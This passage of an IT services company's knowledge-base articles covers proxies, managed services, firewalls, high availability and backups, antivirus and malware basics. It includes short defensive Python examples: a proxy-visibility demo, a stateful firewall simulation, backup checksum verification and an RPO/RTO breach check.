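    """Decide what the proxy does with one client request.
    CONNECT  -> ('tunnel', (host, port), reply): the client gets reply, then the proxy copies bytes
                it cannot read in either direction.
    anything else -> ('forward', (host, port), upstream_request): the rewritten request the proxy sends
                on, and which it could just as easily have altered."""
    method, target, version, headers, body = parse_request(raw)
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        return "tunnel", (host, int(port)), b"HTTP/1.1 200 Connection Established\r\n\r\n"
    url = urlsplit(target)  # a forward proxy receives the absolute-form URL in the request line
    if not url.scheme or not url.hostname:
        raise ValueError("forward proxy expects an absolute URL in the request line")
    path = (url.path or "/") + ("?" + url.query if url.query else "")
    kept = [(n, v) for n, v in headers if n.lower() not in HOP_BY_HOP]
    if not any(n.lower() == "host" for n, _ in kept):
        kept.append(("Host", url.netloc))
    kept.append(("Via", PROXY_NAME))  # RFC 7230 asks intermediaries to announce themselves
    upstream = (f"{method} {path} {version}\r\n".encode()
                + b"".join(f"{n}: {v}\r\n".encode() for n, v in kept)
                + b"\r\n" + body)
    return "forward", (url.hostname, url.port or 80), upstream


def visible_to_proxy(raw):
    """What an honest (non-intercepting) proxy learns from the request alone."""
    mode, (host, port), _ = handle(raw)
    if mode == "tunnel":
        return {"host": host, "port": port}  # no URL path, no headers, no body
    _, target, _, headers, body = parse_request(raw)
    return {"host": host, "port": port, "url": target, "headers": dict(headers), "body": body}


# Constructed client requests.
PLAIN_HTTP = (b"GET http://psa-2.com/account?id=42 HTTP/1.1\r\n"
              b"Host: psa-2.com\r\nProxy-Authorization: Basic dXNlcjpzZWNyZXQ=\r\n"
              b"Cookie: session=abc123\r\nProxy-Connection: keep-alive\r\n\r\n")
TLS_CONNECT = b"CONNECT psa-2.com:443 HTTP/1.1\r\nHost: psa-2.com:443\r\n\r\n"


if __name__ == "__main__":
    print(visible_to_proxy(PLAIN_HTTP))
    print(visible_to_proxy(TLS_CONNECT))
```

For the plain‑HTTP request the proxy has the full URL, the session cookie and the body in hand and is expected to rewrite the request anyway, so nothing technical stops it from altering more than the required headers. For the CONNECT request it never sees past the host and port; an intercepting proxy only gets further by having its own CA trusted on the client.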

Best‑Practice Checklist for Safe Proxy Use

  1. Choose a reputable provider. Look for a clear privacy policy, no‑log claims, and TLS/HTTPS support.
  2. Prefer HTTPS‑aware proxies. Modern web proxies support the CONNECT method, preserving end‑to‑end encryption.
  3. Enable “SSL/TLS verification.” If a proxy terminates TLS on your behalf, it must validate the remote certificate, because your browser no longer can; if it only tunnels CONNECT traffic, your browser still does the checking.
  4. Combine with a VPN for stronger privacy. With the VPN established first, traffic reaches the proxy from the VPN server’s address, so the proxy never learns your real source IP.
  5. Use authentication. Corporate proxies often require a username/password or single‑sign‑on (SSO) – this limits abuse.
  6. Regularly review proxy logs (if you administer one). Look for unusual destinations or volume spikes that could indicate abuse.
  7. Know when a proxy is unnecessary. For simple web browsing, a well‑configured VPN often provides better privacy with less risk.

Conclusion

Proxy servers can be useful tools for privacy, content control, and bandwidth optimization, but they must be chosen and configured carefully. An untrusted, free proxy can become a privacy nightmare, while a well‑run corporate proxy (or a reliable commercial service) adds a valuable layer of protection. For most home users who simply want encrypted, private browsing, a reputable VPN is often the safer and easier choice.

Disclaimer

This article is for **informational purposes only**. PSA Computer Services does **not** offer proxy services, nor do we sell, install, or manage proxy solutions. For guidance on selecting a trustworthy proxy provider or configuring a proxy, please consult a qualified network or security specialist.

What Are Managed Services

Article (PSA‑0007) – What Are Managed Services? (Updated 2025)

A **Managed Services Provider (MSP)** is a trusted IT partner that assumes ongoing responsibility for monitoring, maintaining, and supporting a defined set of technology assets on behalf of a business. The MSP handles routine tasks (patching, backups, alerts) and escalates or resolves issues so you can focus on core business activities.

Key Characteristics (2025)

  • Proactive monitoring – Cloud‑based Remote Monitoring & Management (RMM) platforms to spot problems before they cause downtime.
  • Security‑first mindset – Managed firewalls, endpoint detection & response (EDR), phishing simulations.
  • Scalable service tiers – From basic monitoring to fully‑managed environments that include help‑desk, device provisioning, disaster‑recovery testing, and strategic IT planning.

Typical Managed Services Offering

  • Monitoring & Alerting – 24/7 device health checks, performance dashboards, and automated ticket creation.
  • Patch & Update Management – OS, firmware, and third‑party application updates with rollback capability.
  • Backup & Disaster Recovery – Automated 3‑2‑1 backups, nightly snapshots, and regular restore testing.
  • Security Services – Firewall management, EDR, vulnerability scanning, MFA rollout, and security awareness training.
  • Help‑Desk & End‑User Support – Remote troubleshooting, on‑site visits when needed, ticket tracking, and SLA‑driven response times.

Why Small Businesses Need Managed Services

Even a modest office relies on a complex mix of devices, software, and internet services. When those pieces break, productivity—and revenue—suffer.

  • Predictable costs – A monthly subscription replaces surprise emergency‑repair bills.
  • Reduced downtime – Proactive monitoring and rapid incident response keep email, CRM, accounting, and point‑of‑sale systems online.
  • Security compliance – MSPs keep patches up‑to‑date.
  • Focus on core business – You don’t need an in‑house “IT jack‑of‑all‑trades”; the MSP handles the day‑to‑day tech grind.
  • Scalable expertise – As you add users, or devices, the MSP grows with you without a hiring surge.

Pricing Models (2025 Landscape)

  • Per‑device / per‑user subscription – Most common; you pay a flat fee for each workstation, server, or user license.
  • Tiered service packages – Basic, Standard, and Premium tiers determine response time, on‑site coverage, and breadth of services.
  • Value‑based pricing – Some MSPs tie fees to measurable outcomes (e.g., downtime reduced < 5 % or compliance level achieved).
  • Project‑based add‑ons – Network redesign, or security assessments billed separately.

What to Look For When Choosing an MSP

  1. Service Level Agreement (SLA) – Clearly defined response and resolution times (e.g., 1‑hour critical response).
  2. Certifications & expertise – Microsoft Certified Partner, CompTIA Security+, Cisco CCNA, or vendor‑specific cloud certifications.
  3. Transparent RMM & ticketing – Access to a portal where you can view real‑time alerts, open tickets, and historical reports.
  4. Backup & DR testing – Verify that backups are encrypted, stored off‑site, and that restore tests are performed quarterly.
  5. On‑site support options – Even with remote tools, occasional hands‑on work may be needed; ensure reasonable travel‑fee structures.

Ready to Get Started?

Whether you need basic monitoring or a fully managed IT environment, PSA Computer Services can tailor a solution that fits your budget and growth plans.

Call us today at (707) 506‑6802 to discuss your needs, receive a customized quote, and schedule a free initial IT health assessment.

What Is A Firewall?

Article (PSA‑0006)

A firewall is a security barrier that separates a **trusted** network (your home or business LAN) from an **untrusted** network (the Internet). The term comes from fire‑prevention: just as a special type of wall can slow/stop a fire from spreading, a firewall can stop unwanted traffic from reaching your local devices.

Types of firewalls

  • Software firewall – Runs on an operating system (Windows Defender Firewall, macOS Application Firewall, Linux iptables/nftables, third‑party tools).
  • Hardware firewall – A dedicated appliance or a router with built‑in firewall capabilities.
  • Cloud‑based firewall (FWaaS) – Managed firewalls delivered as a service (e.g., Azure Firewall, AWS Network Firewall, Cloudflare Zero Trust Gateway).
  • Next‑Generation Firewall (NGFW) – Combines traditional packet filtering with deep‑packet inspection, intrusion‑prevention, application control, and often integrated sandboxing.

How Does a Firewall Work?

Firewalls enforce a set of security rules that decide whether to allow or block traffic. They inspect traffic at different layers of the OSI model, using one or more of the following methods.

Core filtering methods

  1. Packet‑filtering (Layer 3/4) – Examines source/destination IP addresses, ports, and protocol type. Simple, fast, but limited to “allow/deny” rules.
  2. Stateful inspection (Layer 4) – Tracks each connection’s state (SYN, SYN‑ACK, ESTABLISHED, FIN). Only packets that belong to a legitimate, established session are permitted, which reduces spoofing.
  3. Proxy / Application‑level gateway (Layer 7) – Acts as an intermediary for specific protocols (HTTP, SMTP, FTP). It can inspect the actual payload, enforce URL filtering, and hide internal IP addresses.
  4. Deep‑packet inspection (DPI) & sandboxing (NGFW) – Analyzes the full content of packets, detects malware, blocks suspicious scripts, and enforces application‑specific policies (e.g., “block Facebook app traffic”).
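The difference between plain packet filtering and stateful inspection is easiest to see in code. The added example below (written for this page, not code from the article or from any firewall product) implements a minimal connection‑tracking filter beside the older “allow anything with the ACK bit set” shortcut and runs both over constructed packets, including a forged‑ACK scan. Addresses, ports and rules are assumptions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # subset of {"SYN", "ACK", "FIN", "RST"}


INSIDE = ipaddress.ip_network("10.0.0.0/24")  # assumed trusted LAN
# Rules are consulted only for packets that try to open a new connection; the default is deny.
RULES = [
    {"action": "allow", "direction": "out", "dports": {80, 443}},                      # browsing from the LAN
    {"action": "allow", "direction": "in", "dports": {22}, "src": "192.168.1.0/24"},  # SSH from the management net
]


def direction(pkt):
    return "out" if ipaddress.ip_address(pkt.src) in INSIDE else "in"


def rule_allows(pkt):
    """Stateless rule match on the 5-tuple: the packet-filtering layer."""
    d = direction(pkt)
    for rule in RULES:
        if rule["direction"] != d or pkt.dport not in rule["dports"]:
            continue
        if "src" in rule and ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule["src"]):
            continue
        return rule["action"] == "allow"
    return False


def stateless_allow(pkt):
    """The pre-stateful shortcut: anything with ACK set is assumed to be part of an existing session.
    A forged ACK (an 'ACK scan') sails straight through, because the flag is under the sender's control."""
    if "ACK" in pkt.flags and "SYN" not in pkt.flags:
        return True
    return rule_allows(pkt)


class StatefulFirewall:
    def __init__(self):
        self.table = {}  # (src, sport, dst, dport) of the initiator -> state

    @staticmethod
    def _keys(pkt):
        forward = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return forward, reverse

    def filter(self, pkt):
        forward, reverse = self._keys(pkt)
        if forward in self.table or reverse in self.table:
            key = forward if forward in self.table else reverse
            if "RST" in pkt.flags or "FIN" in pkt.flags:
                self.table.pop(key, None)  # simplified teardown
            elif {"SYN", "ACK"} <= pkt.flags and key == reverse:
                self.table[key] = "ESTABLISHED"
            return "ALLOW"  # belongs to a session we saw being opened
        if pkt.flags != frozenset({"SYN"}):
            return "DROP"  # no state and not a connection attempt: forged ACK/FIN, stray replies
        if rule_allows(pkt):
            self.table[forward] = "SYN_SENT"
            return "ALLOW"
        return "DROP"


def run_scenario():
    """Constructed packet sequence; returns the decision for each step."""
    fw = StatefulFirewall()
    S, SA, A = frozenset({"SYN"}), frozenset({"SYN", "ACK"}), frozenset({"ACK"})
    ack_scan = Packet("203.0.113.9", 40001, "10.0.0.5", 3389, A)
    return {
        "outbound https syn": fw.filter(Packet("10.0.0.5", 51000, "198.51.100.7", 443, S)),
        "reply syn-ack": fw.filter(Packet("198.51.100.7", 443, "10.0.0.5", 51000, SA)),
        "unsolicited smb syn": fw.filter(Packet("203.0.113.9", 40000, "10.0.0.5", 445, S)),
        "ack scan stateful": fw.filter(ack_scan),
        "ack scan stateless": "ALLOW" if stateless_allow(ack_scan) else "DROP",
        "mgmt ssh syn": fw.filter(Packet("192.168.1.10", 52000, "10.0.0.5", 22, S)),
        "stranger ssh syn": fw.filter(Packet("203.0.113.9", 52001, "10.0.0.5", 22, S)),
    }


if __name__ == "__main__":
    for step, decision in run_scenario().items():
        print(f"{step:22s} {decision}")
```

The reply SYN‑ACK is admitted only because the outbound SYN created an entry for it, and the forged ACK to port 3389 is dropped for the opposite reason: there is no entry, and a bare ACK is not a connection attempt. The stateless variant, which trusts the ACK bit, lets that same packet through.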

Do You Need a Firewall?

Absolutely. If a device can reach the Internet, it should be protected by an up‑to‑date firewall.

  • Windows 10/11 ships with Microsoft Defender Firewall enabled by default. macOS includes an Application Firewall, but it is off by default and must be switched on. Most Linux distributions ship iptables/nftables (often with ufw or firewalld on top), but some, Ubuntu’s ufw included, leave it disabled until you enable it.
  • Home routers / ISP‑provided gateways usually have a basic hardware firewall (NAT + simple packet filter). You can tighten those rules via the router’s web UI.
  • Small‑business networks benefit from a dedicated firewall appliance or a cloud‑based firewall that offers:
    • Intrusion Prevention System (IPS)
    • Application‑aware filtering
    • VPN termination (site‑to‑site and client‑to‑site)
    • Centralized logging & reporting

Quick self‑check

  1. Is the host‑based firewall turned on? (Windows → “Windows Defender Firewall”; macOS → System Settings → Network → Firewall, or Security & Privacy on older versions.)
  2. Does your router have the default “block inbound unsolicited traffic” rule enabled?
  3. Are any ports deliberately opened to the Internet (e.g., remote‑desktop, web server)? If so, confirm they are necessary and secured (use VPN, strong passwords, MFA).
  4. Do you have a separate hardware or cloud firewall for your business network? If not, consider adding one as you scale.

Best‑Practice Checklist for Firewall Management (2025)

  • Keep firmware and definitions up to date. Automatic updates are essential to protect against newly discovered exploits.
  • Apply the principle of least privilege. Only allow traffic that is explicitly required; block everything else by default.
  • Use separate zones. Separate Wi‑Fi guests, IoT devices, and corporate workstations into different VLANs/sub‑nets with inter‑zone firewall rules.
  • Enable logging and alerts. Forward logs to a SIEM or a cloud log service to spot abnormal patterns early.
  • Deploy a VPN or Zero‑Trust Network Access (ZTNA) solution. Remote users should never connect directly to the LAN; tunnel through a secure gateway.
  • Regularly review rules. Conduct a quarterly rule‑audit; remove stale or overly permissive entries.
  • Test your configuration. Use tools such as Nmap or external port‑scan services to verify that only intended ports are open.
  • Consider a Next‑Generation Firewall. For businesses, NGFWs provide integrated IPS, URL filtering, and application control, reducing the need for multiple separate security products.

Emerging Trends (2025 Addendum)

  • AI‑assisted threat detection – Modern NGFWs use machine learning to spot anomalous traffic patterns and automatically quarantine suspicious sessions.
  • Zero‑Trust Network Access (ZTNA) – Complements the perimeter firewall with identity‑centric policies; each request is verified (user, device posture, context) before access is granted, rather than being trusted because it comes from “inside”.
  • Secure Access Service Edge (SASE) – Converges firewall, secure web gateway, and cloud‑based security into a single, globally distributed service.
  • Immutable, cloud‑native firewalls – Provide auto‑scaling, instant provisioning for hybrid‑cloud environments (Azure Firewall Premium, Google Cloud Armor).

Need a Firewall Review or Upgrade?

If you’re unsure whether your current firewall is configured correctly, or simply need a quick health‑check, give PSA Computer Services a call at (707) 506‑6802. We’ll assess your environment, and ensure you have a modern, reliable protective barrier.

High availability – following the backup rule

Article (PSA‑0005)

What “High Availability” (HA) Really Means

High Availability is a design goal that ensures a system delivers an agreed level of uptime – usually 99.9 % (≈ 8.8 h of downtime per year) or higher – even when components fail. Modern businesses (hospitals, data‑centers, SaaS providers, remote offices) depend on HA to keep critical applications running 24/7.

Key HA concepts (2025)

  • Redundancy – Duplicate hardware or virtual instances (servers, storage, network paths) so a single failure never stops service.
  • Failover & Automatic Switchover – Monitoring detects a failure and instantly routes traffic to a standby component (e.g., active‑passive cluster, hot‑standby VM).
  • Load Balancing – Distributes traffic across multiple nodes, improving performance and providing another layer of fault tolerance.
  • Geographic Distribution – Deploying services across multiple data‑center locations or cloud regions reduces the impact of site‑wide outages.
  • Replication & Data Synchronisation – Keeps data copies in near‑real‑time (block‑level or file‑level) on separate nodes.
  • RPO & RTO – Recovery Point Objective (how much data loss is tolerable) and Recovery Time Objective (how quickly service must be restored). HA architectures are built to meet the RPO/RTO goals you define.

Where Backups Fit In

Backups are the foundation of any HA strategy, but they’re just one piece of the puzzle. A solid backup plan protects you from data loss caused by hardware failure, ransomware, accidental deletion, or catastrophic events.

The classic 3‑2‑1‑0 rule (still the gold standard)

  1. 3 – Three copies – Primary data + two additional backups.
  2. 2 – Two media types – For example, an internal NAS (or disk) plus cloud object storage (e.g., Backblaze B2, Azure Blob, Amazon S3).
  3. 1 – One off‑site location – Store at least one copy in a different physical site or a cloud region.
  4. 0 – Zero‑error verification – Test restores regularly (at least quarterly) to confirm backups are usable.

2025‑enhanced backup practices

  • Immutable storage – Write‑once, read‑many (WORM) or object‑storage lock features that prevent even administrators from overwriting recent backups. This thwarts ransomware that tries to encrypt backups.
  • Snapshot‑based protection – Use volume snapshots (VSS on Windows, LVM snapshots on Linux, or ZFS) for near‑instant point‑in‑time copies.
  • Hybrid cloud backup – Combine on‑premise fast restores with cloud durability; many solutions now offer built‑in encryption, compression, and bandwidth throttling.
  • Automated backup testing – Scripts that periodically restore a random file or database row and verify checksum integrity.
  • Ransomware‑aware backup policies – Separate “live” backup streams from “archival” immutable copies; rotate the live backups daily, weekly, monthly.
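The "zero‑error verification" step of the 3‑2‑1‑0 rule and the automated backup testing described above, as an added example that is not part of the original article: `write_manifest()` records a SHA‑256 digest for every file at backup time, and `verify_restore_sample()` later picks a random sample from that manifest, reads the files back from a restored copy and reports any missing or altered file. The directories and files in `demo()` are constructed in a temporary folder to show one clean restore and one that silently lost and corrupted data.

```python
"""Sample-restore verification with a checksum manifest.

Added example (not PSA's own tooling). Run write_manifest() as part of the
backup job and verify_restore_sample() against a test restore on a schedule;
an empty problem list is a passed restore test.
"""
import hashlib
import json
import random
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large backups do not need to fit in RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def write_manifest(source_dir: Path, manifest_path: Path) -> Dict[str, str]:
    """Record relative path -> sha256 for every regular file under source_dir."""
    manifest = {
        str(p.relative_to(source_dir)): sha256_of(p)
        for p in sorted(source_dir.rglob("*")) if p.is_file()
    }
    manifest_path.write_text(json.dumps(manifest, indent=1))
    return manifest


def verify_restore_sample(manifest_path: Path, restore_dir: Path,
                          sample_size: int, seed: Optional[int] = None) -> List[str]:
    """Restore-test a random sample of files; return problems (empty == pass)."""
    manifest: Dict[str, str] = json.loads(manifest_path.read_text())
    rng = random.Random(seed)  # seed only to make drills reproducible
    sample = rng.sample(sorted(manifest), min(sample_size, len(manifest)))
    problems: List[str] = []
    for rel in sample:
        restored = restore_dir / rel
        if not restored.is_file():
            problems.append(f"MISSING {rel}")
        elif sha256_of(restored) != manifest[rel]:
            problems.append(f"CHECKSUM MISMATCH {rel}")
    return problems


def demo() -> Tuple[List[str], List[str]]:
    """Constructed scenario: a faithful restore and one with silent damage."""
    with tempfile.TemporaryDirectory() as tmp:
        src, good, bad = (Path(tmp, name) for name in ("src", "good", "bad"))
        for d in (src, good, bad):
            (d / "docs").mkdir(parents=True)
        for i in range(5):
            for d in (src, good, bad):
                (d / "docs" / f"file{i}.txt").write_bytes(f"record {i}\n".encode())
        # Simulate bit-rot (or a ransomware-touched file) and a lost file in 'bad'.
        (bad / "docs" / "file2.txt").write_bytes(b"record 2 corrupted\n")
        (bad / "docs" / "file4.txt").unlink()
        manifest = Path(tmp, "manifest.json")
        write_manifest(src, manifest)
        return (verify_restore_sample(manifest, good, 5, seed=1),
                verify_restore_sample(manifest, bad, 5, seed=1))


if __name__ == "__main__":
    good_result, bad_result = demo()
    print("clean restore:", good_result or "PASS")
    print("damaged restore:", bad_result)
```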

Putting It All Together: A Simple HA Blueprint

  1. Assess critical services. Identify which applications, databases, and file shares must stay online.
  2. Define RPO/RTO targets. Example: RPO = 15 minutes for ERP database; RTO = 30 minutes for web portal.
  3. Build redundancy. Deploy two servers (or VMs) in an active‑active cluster behind a load balancer; add a second network path (dual ISP or VLAN).
  4. Implement replication. Use real‑time mirroring (e.g., Storage Spaces Direct, DRBD, or cloud‑native database replication) to keep data in sync across nodes.
  5. Apply the 3‑2‑1‑0 backup rule. Schedule daily incremental backups + weekly full backups, store one copy locally, one copy in a second media type, and one copy in a secure cloud region.
  6. Test failover and restore. Quarterly, simulate a server loss and verify that traffic switches automatically, then run a backup‑restore drill to validate data integrity.
  7. Monitor and alert. Use an RMM or SIEM to watch health metrics, backup job success, and latency; set up alerts for any breach of RPO/RTO.
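Step 7's "alert on any breach of RPO/RTO" check, as an added example that is not part of the original article: RPO exposure is measured as the age of the most recent successful backup per service (failed jobs do not count), and RTO is checked against the switchover time measured in the latest failover drill from step 6. The service names, job records and drill results are constructed; the RPO for the ERP database and the RTO for the web portal follow the figures in step 2, the other targets are illustrative.

```python
"""RPO/RTO breach detection over backup-job and failover-drill records.

Added example (not PSA's own monitoring). In practice the two record lists
would come from an RMM or SIEM export; here they are constructed inline.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Sequence, Tuple

# Targets per service (illustrative, matching step 2 where the article gives a figure).
TARGETS: Dict[str, Dict[str, timedelta]] = {
    "erp-db":     {"rpo": timedelta(minutes=15), "rto": timedelta(minutes=60)},
    "web-portal": {"rpo": timedelta(hours=1),    "rto": timedelta(minutes=30)},
}

# Constructed backup-job log: (service, finished_at, status).
BACKUP_JOBS: List[Tuple[str, datetime, str]] = [
    ("erp-db",     datetime(2025, 1, 6, 9, 45), "success"),
    ("erp-db",     datetime(2025, 1, 6, 10, 0), "failed"),   # two failures in a row
    ("erp-db",     datetime(2025, 1, 6, 10, 15), "failed"),
    ("web-portal", datetime(2025, 1, 6, 9, 30), "success"),
]

# Constructed failover-drill results: (service, drill_date, measured switchover time).
FAILOVER_DRILLS: List[Tuple[str, datetime, timedelta]] = [
    ("erp-db",     datetime(2025, 1, 3), timedelta(minutes=40)),
    ("web-portal", datetime(2025, 1, 3), timedelta(minutes=45)),  # slower than its RTO
]


def rpo_exposure(targets: Dict[str, Dict[str, timedelta]],
                 jobs: Sequence[Tuple[str, datetime, str]],
                 now: datetime) -> Dict[str, Optional[timedelta]]:
    """Age of the last *successful* backup per service; None if there is none."""
    last_ok: Dict[str, datetime] = {}
    for service, finished, status in jobs:
        if status == "success" and finished > last_ok.get(service, datetime.min):
            last_ok[service] = finished
    return {svc: (now - last_ok[svc]) if svc in last_ok else None for svc in targets}


def check_slas(targets: Dict[str, Dict[str, timedelta]],
               jobs: Sequence[Tuple[str, datetime, str]],
               drills: Sequence[Tuple[str, datetime, timedelta]],
               now: datetime) -> List[str]:
    """Return one alert line per RPO or RTO breach (empty list == all within target)."""
    alerts: List[str] = []
    exposure = rpo_exposure(targets, jobs, now)
    for svc, t in targets.items():
        age = exposure[svc]
        if age is None:
            alerts.append(f"{svc}: RPO BREACH, no successful backup on record")
        elif age > t["rpo"]:
            alerts.append(f"{svc}: RPO BREACH, last good backup {age} ago (target {t['rpo']})")
    # Only the most recent drill per service counts for RTO.
    latest: Dict[str, Tuple[datetime, timedelta]] = {}
    for svc, when, took in drills:
        if svc not in latest or when > latest[svc][0]:
            latest[svc] = (when, took)
    for svc, t in targets.items():
        if svc not in latest:
            alerts.append(f"{svc}: no failover drill on record, RTO unverified")
        elif latest[svc][1] > t["rto"]:
            alerts.append(f"{svc}: RTO BREACH, last drill took {latest[svc][1]} (target {t['rto']})")
    return alerts


if __name__ == "__main__":
    for line in check_slas(TARGETS, BACKUP_JOBS, FAILOVER_DRILLS, datetime(2025, 1, 6, 10, 20)):
        print(line)
```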

Common Pitfalls to Avoid

  • Treating backups as a “set‑and‑forget” task – without regular testing, backups can be corrupted or incomplete.
  • Relying on a single backup media type (e.g., only external hard drives) – hardware failures are inevitable.
  • Storing all copies in the same physical location – a fire or flood can wipe everything.
  • Neglecting encryption and access controls – unprotected backups are a gold mine for attackers.
  • Ignoring the human factor – document procedures, train staff, and enforce least‑privilege access to backup systems.

Bottom Line

High Availability is much more than “just a backup”. It blends redundancy, real‑time replication, automated failover, and rigorous testing to keep services running. The 3‑2‑1‑0 backup rule remains the foundation, but in 2025 you should augment it with immutable storage, cloud snapshots, and regular restore verification to meet modern RPO/RTO expectations.

Need a Custom HA & Backup Strategy?

PSA Computer Services can design, implement, and test a solution that meets your uptime goals and budget.

Call us today at (707) 506‑6802 for a free assessment.

How Antivirus & Antispyware Work

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials (no longer supported after Jan 2020). If you are still on Windows 7, upgrade to a supported OS or use a third‑party solution, because Microsoft no longer provides definition updates for Windows 7.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Maldetect + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Self‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).

Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Ensure both AV and antispyware engines have the latest signature database.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – Use msconfig (Windows) or systemctl (Linux) to verify nothing suspicious is set to launch automatically.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, verify SSL certificates, and use a reputable browser.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

Introduction to Malicious Software

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code directly in memory using legitimate OS tools (PowerShell, WMI), often driven by post‑exploitation frameworks such as Cobalt Strike. No files are written to disk, making traditional AV signatures less effective.

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
